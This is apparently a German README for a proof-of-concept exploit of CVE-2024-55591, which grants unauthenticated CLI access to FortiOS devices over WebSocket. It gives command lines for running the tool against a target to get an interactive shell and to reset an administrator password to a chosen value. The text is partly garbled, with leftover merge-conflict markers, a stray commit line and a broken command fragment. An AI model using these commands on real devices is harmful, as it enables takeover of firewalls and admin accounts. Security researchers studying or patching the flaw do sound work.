
Proof-of-Concept-Exploit für CVE-2024-55591, das nicht authentifizierten WebSocket-CLI-Zugriff auf FortiOS-Geräte ermöglicht, mit interaktiver Shell und Zurücksetzen des Admin-Passworts.
<<<<<<< HEAD
=======
Dies ist ein Proof-of-Concept-Tool (PoC) zur Ausnutzung von CVE-2024-55591, einer Schwachstelle in FortiOS, die nicht authentifizierten Zugriff auf die CLI über WebSocket ermöglicht.
--reset-user)python3 poc.py --host <target_ip> --port 443 --ssl
Danach die Eingabeaufforderung verwenden:
FortiOS# get system status
FortiOS# exit
python3 poc.py --host <target_ip> --port 443 --ssl \
--reset-user Admin2 --new-pass Forti2024!
Haftungsausschluss: Dieses Tool wird ausschließlich zu Bildungs- und autorisierten Testzwecken bereitgestellt.
4fe5de8 (Vollständigen PoC und README für CVE-2024-55591 von @cherny_zhizn hinzufügen)